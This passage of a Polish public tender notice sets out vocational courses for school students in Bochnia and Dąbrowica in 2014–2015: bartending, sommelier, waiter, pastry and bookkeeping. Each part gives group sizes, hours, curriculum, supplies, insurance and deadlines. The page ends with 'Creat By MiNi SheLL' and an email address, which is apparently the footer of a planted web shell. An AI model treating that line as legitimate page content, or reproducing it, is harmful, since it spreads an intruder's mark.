3. Zamawiający zaleca, aby zajęcia były realizowane po godz.14.00 w dni powszednie oraz w soboty od godz. 8.00 do 14.00. Harmonogram zajęć ustala się w porozumieniu 
z Zamawiającym, który ma prawo do podania własnych terminów odbywania zajęć. 

4. Zadanie polega na przeprowadzeniu kursu barmańskiego z podstawami flair  (dla uczniów Zespołu Szkół nr 3 w Bochni). Celem kursu jest zdobycie niezbędnej wiedzy teoretycznej i praktycznej oraz uzyskanie stosownych dyplomów, certyfikatów, potwierdzających posiadanie wiedzy i umiejętności z zakresu objętego kursem. W programie powinno się znaleźć minimum: sylwetka barmana, akcesoria barmańskie, szkło barowe, technologia i towaroznawstwo napojów alkoholowych i bezalkoholowych, napoje mieszane, technika miksowania, receptury napojów. Tematy przedstawiane przez wykładowców na zajęciach powinny być przygotowane i prezentowane tak, aby każdy słuchacz mógł przynajmniej jeden raz w trakcie zajęć samodzielnie wykonać ćwiczenia związane z wykładanym tematem. Zajęcia mają być prowadzone na surowcach określonych w recepturach z użyciem dekoracji. Na zakończenie zajęć ma być przeprowadzona profesjonalna degustacja. W czasie trwania kursu powinno być przygotowane minimu 15 drinków.
5. Wykonawca zobowiązany jest przekazać na własność każdemu uczestnikowi kursu co najmniej: zeszyt w formacie A4 w twardej oprawie, długopis, materiały i pomoce dydaktyczne dostosowane do programu kursu oraz teczkę na materiały. 

6. Uczestnicy szkolenia zostaną wskazani przez Zamawiającego. Wykonawca zapewni na swój koszt dla każdego uczestnika kursu: ubezpieczenie od następstw nieszczęśliwych wypadków NW (każda osoba musi być ubezpieczona na kwotę min. 10.000 zł podczas szkolenia, w drodze na szkolenie i ze szkolenia) - co wykaże Zamawiającemu przed rozpoczęciem kursu. 
Wykonawca zapewni catering obejmujący: ciasteczka, paluszki, woda, soki, kawa/herbata.

7. Uczestnicy szkolenia zostaną wskazani przez Zamawiającego. Zamawiający zapewnia salę lekcyjną w szkole bez całości sprzętu potrzebnego do przeprowadzenia kursu.

8. Termin realizacji kursu: od dnia podpisania umowy do dnia grupa 1 - do 19.12.2014 r., grupy 2 i 3 - do 10.03.2015 r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 10.03.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Kurs barmański I stopnia (dla uczniów Zespołu Szkół w Dąbrowicy).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Liczba uczestników zajęć - 1 grupa 15 uczniów  z Zespołu Szkół w Dąbrowicy

2. Czas trwania kursu wynosi: 50 godzin łącznie

3. Zamawiający zaleca, aby zajęcia były realizowane po godz.14.00 w dni powszednie oraz w soboty od godz. 8.00 do 14.00. Harmonogram zajęć ustala się w porozumieniu 
z Zamawiającym, który ma prawo do podania własnych terminów odbywania zajęć. 

4. Zadanie polega na przeprowadzeniu kursu barmańskiego I stopnia (dla uczniów Zespołu Szkół w Dąbrowicy). Celem kursu jest zdobycie niezbędnej wiedzy teoretycznej i praktycznej oraz uzyskanie stosownych dyplomów, certyfikatów, potwierdzających posiadanie wiedzy i umiejętności z zakresu objętego kursem. Uczestnicy po zakończonym kursie otrzymają zaświadczenie o ukończeniu kursu, a po pozytywnym zdaniu egzaminu przeprowadzonego przez Wykonawcę uczestnicy uzyskują certyfikat barmański I-go stopnia. Program szkolenia zawierający zajęcia teoretyczne z przewagą zajęć praktycznych. W programie powinno się znaleźć minimum: sylwetka barmana, akcesoria barmańskie, szkło barowe, technologia i towaroznawstwo napojów alkoholowych i bezalkoholowych, napoje mieszane, technika miksowania, receptury napojów. Tematy przedstawiane przez wykładowców na zajęciach powinny być przygotowane i prezentowane tak, aby każdy słuchacz mógł przynajmniej jeden raz w trakcie zajęć samodzielnie wykonać ćwiczenia związane z wykładanym tematem. Zajęcia mają być prowadzone na surowcach określonych w recepturach z użyciem dekoracji. Na zakończenie zajęć ma być przeprowadzona profesjonalna degustacja. W czasie trwania kursu powinno być przygotowane minimu 15 drinków.

5. Wykonawca zobowiązany jest przekazać na własność każdemu uczestnikowi kursu co najmniej: zeszyt w formacie A4 w twardej oprawie, długopis, materiały i pomoce dydaktyczne dostosowane do programu kursu oraz teczkę na materiały. 

6. Uczestnicy szkolenia zostaną wskazani przez Zamawiającego. Wykonawca zapewni na swój koszt dla każdego uczestnika kursu: ubezpieczenie od następstw nieszczęśliwych wypadków NW (każda osoba musi być ubezpieczona na kwotę min. 10.000 zł podczas szkolenia, w drodze na szkolenie i ze szkolenia) - co wykaże Zamawiającemu przed rozpoczęciem kursu.
Wykonawca zapewni catering obejmujący: ciasteczka, paluszki, woda, soki, kawa/herbata.

7. Uczestnicy szkolenia zostaną wskazani przez Zamawiającego. Zamawiający zapewnia salę lekcyjną w szkole bez całości sprzętu potrzebnego do przeprowadzenia kursu.

8. Termin realizacji kursu: od dnia podpisania umowy do dnia 19.12.2014 r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 19.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Kurs sommelierski (dla uczniów Zespołu Szkół nr 3 w Bochni).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Liczba uczestników zajęć - 3 grupy po  15 uczniów z Zespołu Szkół nr 3 w Bochni

2. Czas trwania kursu wynosi: dla każdej z grup po 25 godzin

3. Zamawiający zaleca, aby zajęcia były realizowane po godz. 14.00 w dni powszednie oraz w soboty od godz. 8.00 do 14.00. Harmonogram zajęć ustala się w porozumieniu 
z Zamawiającym, który ma prawo do podania własnych terminów odbywania zajęć. 

4. Zadanie polega na przeprowadzeniu kursu sommelierskiego (dla uczniów Zespołu Szkół nr 3 w Bochni). Celem kursu jest zdobycie niezbędnej wiedzy teoretycznej i praktycznej oraz uzyskanie stosownych dyplomów, certyfikatów, potwierdzających posiadanie wiedzy i umiejętności. Uczestnicy po zakończonym kursie otrzymają zaświadczenie o ukończeniu kursu, a po pozytywnym zdaniu egzaminu uczestnicy uzyskują certyfikat sommelierski I-go stopnia. Program szkolenia zawierający zajęcia teoretyczne z przewagą zajęć praktycznych. W programie powinno się znaleźć minimum: podstawowe zagadnienia z zakresu serwisu win oraz degustacji analitycznej wyselekcjonowanych trunków.
- Zawód Sommelier - omówienie
- Historia wina na świecie
- Typologia win 
- Fizjologia smaku
- Technologia produkcji win białych, różowych, czerwonych, musujących
- Najważniejsze odmiany winorośli
- Klasyfikacja jakościowa, przepisy prawne Francji, Włoch, Hiszpanii, Austrii, Niemiec
- Główne regiony produkcji wina 
- Jak czytać etykietę 
- Rodzaje korków, beczek, butelek 
- Przechowywanie win, strategia dojrzewania, wady wina
- Temperatury podawania
- Doprowadzanie wina do odpowiedniej temperatury
- Rodzaje kieliszków, karafek i akcesoria sommelierskie
- Serwis win białych, czerwonych, musujących -ćwiczenia praktyczne (każdego dnia)
- Napowietrzanie i dekantacja
- Kolejność podawania win 
- Okazje specjalne, przyjęcia, degustacje 
- Reklamacje 
- Psychologia gości
- Sposoby jak być dobrym sommelierem
- Wino i potrawy - zasady ogólne
- Omówienie przykładowej karty  win restauracji 
- Degustacje analityczne (każdego dnia, z wykorzystaniem tabel degustacyjnych).

5. Wykonawca zobowiązany jest przekazać na własność każdemu uczestnikowi kursu co najmniej: zeszyt w formacie A4 w twardej oprawie, długopis, materiały i pomoce dydaktyczne dostosowane do programu kursu oraz teczkę na materiały. 

6. Uczestnicy szkolenia zostaną wskazani przez Zamawiającego. Wykonawca zapewni na swój koszt dla każdego uczestnika kursu: ubezpieczenie od następstw nieszczęśliwych wypadków NW (każda osoba musi być ubezpieczona na kwotę min. 10.000 zł podczas szkolenia, w drodze na szkolenie i ze szkolenia). Wykonawca zapewni catering obejmujący: ciasteczka, paluszki, woda, soki, kawa/herbata.

7. Miejsce kursu Bochnia (Zespoł Szkół nr 3 w Bochni). Uczestnicy szkolenia zostaną wskazani przez Zamawiającego. Zamawiający zapewnia salę lekcyjną w szkole bez całości sprzętu potrzebnego do przeprowadzenia kursu.

8. Termin realizacji kursu: od dnia podpisania umowy do dnia:  grupa 1 - do 19.12.2014 r., grupy 2 i 3 - do 10.03.2015 r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 10.03.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Kurs kelnerski (dla uczniów Zespołu Szkół nr 3 w Bochni).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Liczba uczestników zajęć - 4 grupy ( 2 grupy po 13 osób, 2 grupy po 12 osób) z Zespołu Szkół nr 3 w Bochni

2. Czas trwania kursu wynosi: 25 godziny dla każdej z grup

3. Zamawiający zaleca, aby zajęcia były realizowane po godz.14.00 w dni powszednie oraz w soboty od godz. 8.00 do 14.00. Harmonogram zajęć ustala się w porozumieniu z Zamawiającym, który ma prawo do podania własnych terminów odbywania zajęć. 

4. Zadanie polega na przeprowadzeniu kursu kelnerskiego (dla uczniów Zespołu Szkół nr 3 w Bochni). Celem kursu jest zdobycie niezbędnej wiedzy teoretycznej i praktycznej oraz uzyskanie stosownych dyplomów, certyfikatów, potwierdzających posiadanie wiedzy i umiejętności z zakresu zawodu kelnera. Uczestnicy po zakończonym kursie otrzymują zaświadczenie o ukończeniu kursu, a po pozytywnym zdaniu egzaminu przeprowadzonego przez Wykonawcę uczestnicy uzyskują certyfikat uprawniający do wykonania zawodu kelnera w zakresie podstawowym. Program szkolenia zawierający zajęcia teoretyczne z przewagą zajęć praktycznych W programie powinno się znaleźć minimum: sylwetka kelnera, wyposażenie sali obsługi konsumenta, bielizna i zastawa stołowa, karta menu, przenoszenie tac i zastawy stołowej, przebieg obsługi gości, metody obsługi, podawanie potraw i napojów, przyjęcia okolicznościowe, systemy rozliczeń kelnerskich, rozwiązywanie sytuacji problemowych w pracy kelnera. Tematy przedstawiane przez wykładowców na zajęciach powinny być przygotowane i prezentowane tak, aby każdy słuchacz mógł przynajmniej jeden raz w trakcie zajęć samodzielnie wykonać ćwiczenia związane z wykładanym tematem. Zajęcia mają być prowadzone na surowcach określonych w recepturach z użyciem dekoracji. Na zakończenie zajęć ma być przeprowadzona profesjonalna degustacja.

5. Wykonawca zobowiązany jest przekazać na własność każdemu uczestnikowi kursu co najmniej: zeszyt w formacie A4 w twardej oprawie, długopis, materiały i pomoce dydaktyczne dostosowane do programu kursu oraz teczkę na materiały. 

6. Uczestnicy szkolenia zostaną wskazani przez Zamawiającego. Wykonawca zapewni na swój koszt dla każdego uczestnika kursu: ubezpieczenie od następstw nieszczęśliwych wypadków NW (każda osoba musi być ubezpieczona na kwotę min. 10.000 zł podczas szkolenia, w drodze na szkolenie i ze szkolenia) - co wykaże Zamawiającemu przed rozpoczęciem kursu. 
Wykonawca zapewni catering obejmujący: ciasteczka, paluszki, woda, soki, kawa/herbata.

7. Miejsce kursu Bochnia (Zespół Szkół Nr 3 w Bochni). Uczestnicy szkolenia zostaną wskazani przez Zamawiającego. Zamawiający zapewnia salę lekcyjną w szkole bez całości sprzętu potrzebnego do przeprowadzenia kursu. 

8. Termin realizacji kursu: od dnia podpisania umowy do dnia:  grupy 1 i 2 - do 19.12.2014 r., grupy 3 i 4 - do 10.03.2015 r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 10.03.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Kurs kelnerski (dla uczniów Specjalnego Ośrodka Szkolno - Wychowawczego w Bochni).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Liczba uczestników zajęć - 1 grupa 7 uczniów Specjalnego Ośrodka Szkolno - Wychowawczego w Bochni

2. Czas trwania kursu wynosi: 25 godzin

3. Zamawiający zaleca, aby zajęcia były realizowane po godz.14.00 w dni powszednie oraz w soboty od godz. 8.00 do 14.00. Harmonogram zajęć ustala się w porozumieniu z Zamawiającym, który ma prawo do podania własnych terminów odbywania zajęć. 

4. Zadanie polega na przeprowadzeniu kursu kelnerskiego (dla uczniów Specjalnego Ośrodka Szkolno - Wychowawczego w Bochni). Celem kursu jest zdobycie niezbędnej wiedzy teoretycznej i praktycznej oraz uzyskanie stosownych dyplomów, certyfikatów, potwierdzających posiadanie wiedzy i umiejętności z zakresu zawodu kelnera). Uczestnicy po zakończonym kursie otrzymują zaświadczenie o ukończeniu kursu, a po pozytywnym zdaniu egzaminu przeprowadzonego przez Wykonawcę uczestnicy uzyskują certyfikat uprawniający do wykonania zawodu kelnera w zakresie podstawowym. Program szkolenia zawierający zajęcia teoretyczne z przewagą zajęć praktycznych W programie powinno się znaleźć minimum: sylwetka kelnera, wyposażenie sali obsługi konsumenta, bielizna i zastawa stołowa, karta menu, przenoszenie tac i zastawy stołowej, przebieg obsługi gości, metody obsługi, podawanie potraw i napojów, przyjęcia okolicznościowe, systemy rozliczeń kelnerskich, rozwiązywanie sytuacji problemowych w pracy kelnera. Tematy przedstawiane przez wykładowców na zajęciach powinny być przygotowane i prezentowane tak, aby każdy słuchacz mógł przynajmniej jeden raz w trakcie zajęć samodzielnie wykonać ćwiczenia związane z wykładanym tematem. Zajęcia mają być prowadzone na surowcach określonych w recepturach z użyciem dekoracji. Na zakończenie zajęć ma być przeprowadzona profesjonalna degustacja.

5. Wykonawca zobowiązany jest przekazać na własność każdemu uczestnikowi kursu co najmniej: zeszyt w formacie A4 w twardej oprawie, długopis, materiały i pomoce dydaktyczne dostosowane do programu kursu oraz teczkę na materiały. 

6. Uczestnicy szkolenia zostaną wskazani przez Zamawiającego. Wykonawca zapewni na swój koszt dla każdego uczestnika kursu: ubezpieczenie od następstw nieszczęśliwych wypadków NW (każda osoba musi być ubezpieczona na kwotę min. 10.000 zł podczas szkolenia, w drodze na szkolenie i ze szkolenia) - co wykaże Zamawiającemu przed rozpoczęciem kursu. 
Wykonawca zapewni catering obejmujący: ciasteczka, paluszki, woda, soki, kawa/herbata.

7. Miejsce kursu Bochnia (Specjalny Ośrodek Szkolno - Wychowawczy w Bochni). Uczestnicy szkolenia zostaną wskazani przez Zamawiającego. Zamawiający zapewnia salę lekcyjną w szkole bez całości sprzętu potrzebnego do przeprowadzenia kursu.

8. Termin realizacji kursu: od dnia podpisania umowy do dnia 19.12.2014 r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 19.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Kurs cukierniczy - wypieki i dekoracje porcjowe (dla uczniów Zespołu Szkół w Dąbrowicy).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Liczba uczestników zajęć - 1 grupa 8 uczniów z Zespołu Szkół w Dąbrowicy

2. Czas trwania kursu wynosi: 40 godzin łącznie 

3. Zamawiający zaleca, aby zajęcia były realizowane po godz.14.00 w dni powszednie oraz w soboty od godz. 8.00 do 14.00. Harmonogram zajęć ustala się w porozumieniu 
z Zamawiającym, który ma prawo do podania własnych terminów odbywania zajęć. 

4. Zadanie polega na przeprowadzeniu kursu szkolenie cukiernicze wypieki i dekoracje porcjowe (dla uczniów Zespołu Szkół w Dąbrowicy). Celem kursu jest zdobycie niezbędnej wiedzy teoretycznej i praktycznej oraz uzyskanie stosownych dyplomów, certyfikatów, potwierdzających posiadanie wiedzy i umiejętności z zakresu objętego kursem . Uczestnicy po zakończonym kursie otrzymają zaświadczenie o ukończeniu kursu, a po pozytywnym zdaniu egzaminu przeprowadzonego przez Wykonawcę uczestnicy uzyskują certyfikat. Program szkolenia zawierający zajęcia teoretyczne z przewagą zajęć praktycznych. W programie powinno się znaleźć minimum: podstawowe techniki sporządzania różnych ciast, kompozycja tortów, elementy dekoracji z karmelu, czekolady, figurki i elementy dekoracyjne z marcepanu prawdziwego i sztucznego, dekoracja punktowa z agaru, dekoracja ciastek bankietowych i innej galanterii cukierniczej, desery mrożone typu poctizer. Tematy przedstawiane przez wykładowców na zajęciach powinny być przygotowane i prezentowane tak, aby każdy słuchacz mógł przynajmniej jeden raz w trakcie zajęć samodzielnie wykonać ćwiczenia związane z wykładanym tematem. Zajęcia mają być prowadzone na surowcach określonych w recepturach z użyciem dekoracji. Na zakończenie zajęć ma być przeprowadzona profesjonalna degustacja.

5. Wykonawca zobowiązany jest przekazać na własność każdemu uczestnikowi kursu co najmniej: zeszyt w formacie A4 w twardej oprawie, długopis, materiały i pomoce dydaktyczne dostosowane do programu kursu oraz teczkę na materiały. 

6. Uczestnicy szkolenia zostaną wskazani przez Zamawiającego. Wykonawca zapewni na swój koszt dla każdego uczestnika kursu: ubezpieczenie od następstw nieszczęśliwych wypadków NW (każda osoba musi być ubezpieczona na kwotę min. 10.000 zł podczas szkolenia, w drodze na szkolenie i ze szkolenia) - co wykaże Zamawiającemu przed rozpoczęciem kursu. 
Wykonawca zapewni catering obejmujący: ciasteczka, paluszki, woda, soki, kawa/herbata.

7. Uczestnicy szkolenia zostaną wskazani przez Zamawiającego. Zamawiający zapewnia salę lekcyjną w szkole bez całości sprzętu potrzebnego do przeprowadzenia kursu.

8. Termin realizacji kursu: od dnia podpisania umowy do dnia 19.12.2014 r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 19.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Kurs księga przychodów i rozchodów (dla uczniów Zespołu Szkół nr 3 w Bochni).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Liczba uczestników zajęć - 2 grupy 12 uczniów z Zespołu Szkół nr 3 w Bochni

2. Czas trwania kursu wynosi: 40 godzin

3. Zamawiający zaleca, aby zajęcia były realizowane po godz.14.00 w dni powszednie oraz w soboty od godz. 8.00 do 18.00. Harmonogram zajęć ustala się w porozumieniu z Zamawiającym, który ma prawo do podania własnych terminów odbywania zajęć. 

4. Zadanie polega na przeprowadzeniu kursu księga przychodów i rozchodów (dla uczniów Zespołu Szkół nr 3 w Bochni). Celem kursu jest zdobycie niezbędnej wiedzy teoretycznej i praktycznej oraz uzyskanie stosownych dyplomów, certyfikatów, potwierdzających posiadanie wiedzy i umiejętności w zakresie objętym kursem. Uczestnicy po zakończonym kursie otrzymają zaświadczenie o ukończeniu kursu, a po pozytywnym zdaniu egzaminu przeprowadzonego przez Wykonawcę uczestnicy uzyskują certyfikat potwierdzający kwalifikacje w obrębie zawodu Księgowy. Wykonawca zapewnienia na każdych zajęciach 1 stanowisko komputerowe na 1 uczestnika z programem: Mała Księgowość Symfonia do obsługi podatkowej książki przychodów i rozchodów. Program szkolenia zawierający zajęcia teoretyczne z przewagą zajęć praktycznych: przygotowanie uczestników do prowadzenia księgowości uproszczonej i pracy w księgowości tzn.: zapoznanie z wymaganym materiałem teoretycznym, z typowymi dokumentami księgowymi i urządzeniami księgowymi typu: książka przychodów-rozchodów wraz niezbędnymi rejestrami i ewidencjami, - praktyczne opanowanie umiejętności pracy księgowego: posługiwanie się księgowymi dokumentami, realizacja typowych operacji księgowych, naliczanie ZUS, płac, podatków, księgowanie do kolumn ksiąg, prowadzenie przychodów-rozchodów, sporządzanie deklaracji PIT, ZUS, VAT: w formie tradycyjnej i informatycznej, -Tematy przedstawiane przez wykładowców na zajęciach powinny być przygotowane i prezentowane tak, aby każdy słuchacz mógł przynajmniej jeden raz w trakcie zajęć samodzielnie wykonać ćwiczenia związane z wykładanym tematem.

5. Wykonawca zobowiązany jest przekazać na własność każdemu uczestnikowi kursu co najmniej: zeszyt w formacie A4 w twardej oprawie, długopis, materiały i pomoce dydaktyczne dostosowane do programu kursu oraz teczkę na materiały. 

6. Uczestnicy szkolenia zostaną wskazani przez Zamawiającego. Wykonawca zapewni na swój koszt dla każdego uczestnika kursu: ubezpieczenie od następstw nieszczęśliwych wypadków NW (każda osoba musi być ubezpieczona na kwotę min. 10.000 zł podczas szkolenia, w drodze na szkolenie i ze szkolenia) - co wykaże Zamawiającemu przed rozpoczęciem kursu. 
Wykonawca zapewni catering obejmujący: ciasteczka, paluszki, woda, soki, kawa/herbata.

7. Miejsce kursu Bochnia (Zespół Szkół Nr 3 w Bochni). Uczestnicy szkolenia zostaną wskazani przez Zamawiającego. Zamawiający zapewnia salę lekcyjną w szkole bez całości sprzętu potrzebnego do przeprowadzenia kursu. 

8. Termin realizacji kursu: od dnia podpisania umowy do dnia:  grupa 1 - 19.12.2014, grupa 2 - 10.03.2015 r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 10.03.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com